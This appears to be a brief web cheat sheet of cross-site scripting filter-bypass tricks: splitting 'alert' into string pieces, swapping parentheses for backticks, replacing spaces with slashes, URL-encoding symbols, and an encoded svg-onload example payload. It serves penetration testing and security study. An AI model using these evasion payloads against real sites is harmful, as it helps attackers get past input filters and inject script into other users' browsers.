Basic XSS Encoding Tips
Basic XSS Encoding Tips ⏬
alert = window["al"+"ert"]
bypass () with ``
replace space with /
encode symbols:
< = %3c
> = %3e
" = %22
[ = %5b
] = %5d
` = %60
Example Payload: %3csvg/onload=window%5b"al"+"ert"%5d1337
%3e
Last updated
Was this helpful?